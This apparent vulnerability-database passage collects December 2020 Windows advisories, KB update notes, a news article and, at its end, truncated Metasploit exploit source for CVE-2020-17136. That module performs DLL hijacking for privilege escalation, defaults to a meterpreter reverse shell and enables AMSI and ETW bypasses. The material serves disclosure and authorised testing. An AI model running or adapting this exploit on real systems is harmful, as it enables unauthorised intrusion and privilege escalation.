\nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## How to get this update\n\n**Before installing this update**\n\n**IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020. For more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n\n**Prerequisite:** You must install the updates listed below and **_restart your device_** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. 
This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the _latest_ SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).\n\n**Install this update**\n\n**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4592498>) website. 
\nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows: **Product**: Windows Server 2008 Service Pack 2; **Classification**: Security Updates \n\n**File information**\n\nFor a list of the files that are provided in this update, download the [file information for cumulative update 4592498](<https://download.microsoft.com/download/d/8/3/d8307ad9-933a-4a91-a808-6d2a1927123c/4592498.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "December 8, 2020\u2014KB4592498 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17098"], "modified": "2020-12-08T08:00:00", "id": "KB4592498", "href": "https://support.microsoft.com/en-us/help/4592498", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:36:36", "description": "An information disclosure vulnerability has been reported in the SMBv2 component of Microsoft Windows SMB server. 
The vulnerability is due to improper handling of SMB2_SET_INFO messages. A remote, authenticated attacker can exploit this vulnerability by sending crafted SMBv2 messages to the target server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-08T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows SMB Server Information Disclosure (CVE-2020-17140)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2020-12-08T00:00:00", "id": "CPAI-2020-1272", "href": "", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-02-16T19:36:37", "description": "A remote code execution vulnerability exists in Microsoft Windows. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows SMB Remote Code Execution (CVE-2020-17096)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17096"], "modified": "2020-12-08T00:00:00", "id": "CPAI-2020-1250", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-08-17T17:47:58", "description": "# CVE-2020-17136\nCVE-2020-17136 explo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-18T11:16:36", "type": "githubexploit", "title": "Exploit for 
Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17136"], "modified": "2021-03-31T14:42:21", "id": "DAF55AA9-F00A-533A-A843-3EC20DDE6BD0", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "ubuntucve": [{"lastseen": "2022-08-04T13:24:01", "description": "Kerberos Security Feature Bypass Vulnerability\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | this is a Microsoft-specific issue\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-10T00:00:00", "type": "ubuntucve", "title": "CVE-2020-16996", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16996"], "modified": "2020-12-10T00:00:00", "id": "UB:CVE-2020-16996", "href": "https://ubuntu.com/security/CVE-2020-16996", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], "ibm": [{"lastseen": "2022-08-04T12:57:45", "description": "## Summary\n\nMultiple Vulnerabilities identified in MS Windows Server platforms. Information about vulnerabilities has been published in the provider security update guide. \n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nMain Product version (s)| Affected Supporting Product Version(s) \n---|--- \nIBM Cloud Pak System V2.3| Microsoft Windows Server 2012 Microsoft Windows Server 2016 Microsoft Windows Server 2019 \n \n\n\n## Remediation/Fixes\n\nInformation about vulnerabilities in MS Windows Server platforms has been published in the provider security updates. If you are running specific configurations, recommendation is to review your environment. Consult Security Update Guide to search for available patches corresponding to the platform in use in your environment, see [MS Security TechCenter - December 2020](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16996> \"Kerberos Security Feature Bypass Vulnerability\" ). 
\n\n## Workarounds and Mitigations\n\nnone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](<http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\n[MS Security Update Guide](<https://msrc.microsoft.com/update-guide/>)\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n06 Apr 2021: Initial Publication \n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. 
Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU004\",\"label\":\"Hybrid Cloud\"},\"Product\":{\"code\":\"SSFQWQ\",\"label\":\"IBM Cloud Pak System\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.3\",\"Edition\":\"\"}]", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-06T23:03:35", "type": "ibm", "title": "Security Bulletin: Multiple Vulnerabilities in Windows Server supporting products bundled with Cloud Pak Systems", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 
"LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16996"], "modified": "2021-04-06T23:03:35", "id": "F34133DBAC4F6FEF866DB845BED95244FB18E8AD56C9EDC4C9EFFFDFD49046C8", "href": "https://www.ibm.com/support/pages/node/6440675", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], "thn": [{"lastseen": "2022-05-09T12:38:42", "description": "[](<https://thehackernews.com/images/-wZcaIEHX7Zo/X9BZDmYe2-I/AAAAAAAABMU/Pg1oyzktpWMoZFhMfp5peSGqQMfOdZQqwCLcBGAsYHQ/s0/Update-Microsoft-Windows.jpg>)\n\nMicrosoft on Tuesday released fixes for 58 newly discovered security flaws spanning as many as 11 products and services as part of its final [Patch Tuesday of 2020](<https://msrc.microsoft.com/update-guide/releaseNote/2020-Dec>), effectively bringing their CVE total to 1,250 for the year.\n\nOf these 58 patches, nine are rated as Critical, 46 are rated as Important, and three are rated Moderate in severity.\n\nThe December security release addresses issues in Microsoft Windows, Edge browser, ChakraCore, Microsoft Office, Exchange Server, Azure DevOps, Microsoft Dynamics, Visual Studio, Azure SDK, and Azure Sphere.\n\nFortunately, none of these flaws this month have been reported as publicly known or being actively exploited in the wild.\n\nThe fixes for December concern a number of remote code execution (RCE) flaws in Microsoft Exchange (CVE-2020-17132), SharePoint (CVE-2020-17118 and CVE-2020-17121), Excel (CVE-2020-17123), and Hyper-V virtualization software (CVE-2020-17095), as well as a patch for a security feature bypass in Kerberos (CVE-2020-16996), and a number of privilege escalation flaws in Windows Backup Engine and Windows Cloud Files Mini Filter Driver.\n\nCVE-2020-17095 also 
carries the highest CVSS score of 8.5 among all vulnerabilities addressed in this month's release.\n\n\"To exploit this vulnerability, an attacker could run a specially crafted application on a Hyper-V guest that could cause the Hyper-V host operating system to execute arbitrary code when it fails to properly validate vSMB packet data,\" Microsoft [noted](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17095>).\n\nAdditionally included as part of this month's release is an [advisory](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/ADV200013>) for a [DNS cache poisoning](<https://blog.cloudflare.com/sad-dns-explained/>) vulnerability (CVE-2020-25705) discovered by security researchers from Tsinghua University and the University of California last month.\n\nDubbed a Side-channel AttackeD DNS attack (or [SAD DNS attack](<https://thehackernews.com/2020/11/sad-dns-new-flaws-re-enable-dns-cache.html>)), the flaw could enable an attacker to spoof the DNS packet, which can be cached by the DNS Forwarder or the DNS Resolver, thereby re-enabling DNS cache poisoning attacks.\n\nTo mitigate the risk, Microsoft recommends a Registry workaround that involves changing the maximum UDP packet size to 1,221 bytes (4C5 Hexadecimal).\n\n\"For responses larger than 4C5 or 1221, the DNS resolver would now switch to TCP,\" the Windows maker stated in its advisory.\n\nSince the attack relies on sending spoofed UDP (User Datagram Protocol) messages to defeat source port randomization for DNS requests, implementing the tweak will cause larger DNS queries to switch to TCP, thus mitigating the flaw.\n\nIt's highly advised that Windows users and system administrators apply the latest security patches to resolve the threats associated with these issues.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update, or by selecting Check for Windows updates.\n",
"cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-09T04:57:00", "type": "thn", "title": "Microsoft Releases Windows Update (Dec 2020) to Fix 58 Security Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16996", "CVE-2020-17095", "CVE-2020-17118", "CVE-2020-17121", "CVE-2020-17123", "CVE-2020-17132", "CVE-2020-25705"], "modified": "2020-12-09T04:58:40", "id": "THN:BCD236457064C9D8673B1536BE370718", "href": "https://thehackernews.com/2020/12/microsoft-releases-windows-update-dec.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2022-06-24T08:41:27", "description": "The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December 2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when calling FltCreateFileEx() and FltCreateFileEx2() within its 
HsmpOpCreatePlaceholders() function with attacker controlled input. This meant that files were created with KernelMode permissions, thereby bypassing any security checks that would otherwise prevent a normal user from being able to create files in directories they don't have permissions to create files in. This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage Spaces SMP service, which grants the attacker code execution as the NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one of the Meterpreter payloads, as doing so will allow them to subsequently escalate their new session from NETWORK SERVICE to SYSTEM by using Meterpreter's \"getsystem\" command to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-04T18:04:38", "type": "metasploit", "title": "CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1170", "CVE-2020-17136"], "modified": "2022-03-21T12:47:39", "id": 
"MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2020_17136-", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/cve_2020_17136/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n include Exploit::EXE\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Post::Windows::Dotnet\n include Msf::Post::Windows::Services\n include Msf::Post::Windows::FileSystem\n include Msf::Exploit::FileDropper\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP',\n 'Description' => %q{\n The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December\n 2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when\n calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders()\n function with attacker controlled input. This meant that files were created with\n KernelMode permissions, thereby bypassing any security checks that would otherwise\n prevent a normal user from being able to create files in directories\n they don't have permissions to create files in.\n\n This module abuses this vulnerability to perform a DLL hijacking attack against the\n Microsoft Storage Spaces SMP service, which grants the attacker code execution as the\n NETWORK SERVICE user. 
Users are strongly encouraged to set the PAYLOAD option to one\n of the Meterpreter payloads, as doing so will allow them to subsequently escalate their\n new session from NETWORK SERVICE to SYSTEM by using Meterpreter's \"getsystem\" command\n to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'James Forshaw', # Vulnerability discovery and PoC creator\n 'Grant Willcox' # Metasploit module\n ],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'Privileged' => true,\n 'Arch' => [ARCH_X64],\n 'Targets' => [\n [ 'Windows DLL Dropper', { 'Arch' => [ARCH_X64], 'Type' => :windows_dropper } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2020-03-10',\n 'References' => [\n ['CVE', '2020-17136'],\n ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=2082'],\n ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17136']\n ],\n 'Notes' => {\n 'SideEffects' => [ ARTIFACTS_ON_DISK ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultOptions' => {\n 'EXITFUNC' => 'process',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n },\n 'Compat' => {\n 'Meterpreter' => {\n 'Commands' => %w[\n stdapi_sys_process_attach\n stdapi_sys_process_execute\n stdapi_sys_process_get_processes\n stdapi_sys_process_getpid\n stdapi_sys_process_kill\n stdapi_sys_process_memory_allocate\n stdapi_sys_process_memory_write\n stdapi_sys_process_thread_create\n ]\n }\n }\n )\n )\n register_options(\n [\n OptBool.new('AMSIBYPASS', [true, 'Enable Amsi bypass', true]),\n OptBool.new('ETWBYPASS', [true, 'Enable Etw bypass', true]),\n OptInt.new('WAIT', [false, 'Time in seconds to wait', 5])\n ], self.class\n )\n\n register_advanced_options(\n [\n OptBool.new('KILL', [true, 'Kill the injected process at the end of the task', false])\n ]\n )\n end\n\n def check_requirements(clr_req, installed_dotnet_versions)\n installed_dotnet_versions.each 
do |fi|\n if clr_req == 'v4.0.30319'\n if fi[0] == '4'\n vprint_status('Requirements ok')\n return true\n end\n elsif fi[0] == '3'\n vprint_status('Requirements ok')\n return true\n end\n end\n print_error('Required dotnet version not present')\n false\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n build_num_raw = cmd_exec('cmd.exe /c ver')\n build_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)\n if build_num.nil?\n return CheckCode::Unknown(\"Couldn't retrieve the target's build number!\")\n else\n build_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)[0]\n vprint_status(\"Target's build number: #{build_num}\")\n end\n\n build_num_gemversion = Rex::Version.new(build_num)\n # Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/\n if (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) && (build_num_gemversion < Rex::Version.new('10.0.19042.685')) # Windows 10 20H2\n return CheckCode::Appears('A vulnerable Windows 10 20H2 build was detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) && (build_num_gemversion < Rex::Version.new('10.0.19041.685')) # Windows 10 v2004 aka 20H1\n return CheckCode::Appears('A vulnerable Windows 10 20H1 build was detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) && (build_num_gemversion < Rex::Version.new('10.0.18363.1256')) # Windows 10 v1909\n return CheckCode::Appears('A vulnerable Windows 10 v1909 build was detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) && (build_num_gemversion < Rex::Version.new('10.0.18362.1256')) # Windows 10 v1903\n return CheckCode::Appears('A vulnerable Windows 10 v1903 build was detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) && 
(build_num_gemversion < Rex::Version.new('10.0.17763.1637')) # Windows 10 v1809\n return CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) && (build_num_gemversion < Rex::Version.new('10.0.17134.1902')) # Windows 10 v1803\n return CheckCode::Appears('A vulnerable Windows 10 v1803 build was detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def exploit\n if sysinfo['Architecture'] != ARCH_X64\n fail_with(Failure::NoTarget, 'This module currently only supports targeting x64 systems!')\n elsif session.arch != ARCH_X64\n fail_with(Failure::NoTarget, 'Sorry, WOW64 is not supported at this time!')\n end\n dir_junct_path = 'C:\\\\Windows\\\\Temp'\n intermediate_dir = rand_text_alpha(10).to_s\n junction_dir = rand_text_alpha(10).to_s\n path_to_intermediate_dir = \"#{dir_junct_path}\\\\#{intermediate_dir}\"\n\n mkdir(path_to_intermediate_dir.to_s)\n if !directory?(path_to_intermediate_dir.to_s)\n fail_with(Failure::UnexpectedReply, 'Could not create the intermediate directory!')\n end\n register_dir_for_cleanup(path_to_intermediate_dir.to_s)\n\n mkdir(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\")\n if !directory?(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\")\n fail_with(Failure::UnexpectedReply, 'Could not create the junction directory as a folder!')\n end\n\n mount_handle = create_mount_point(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\", 'C:\\\\')\n if !directory?(\"#{path_to_intermediate_dir}\\\\#{junction_dir}\")\n fail_with(Failure::UnexpectedReply, 'Could not transform the junction directory into a junction!')\n end\n\n exe_path = ::File.expand_path(::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-17136', 'cloudFilterEOP.exe'))\n unless File.file?(exe_path)\n fail_with(Failure::BadConfig, 'Assembly not found')\n end\n installed_dotnet_versions = 
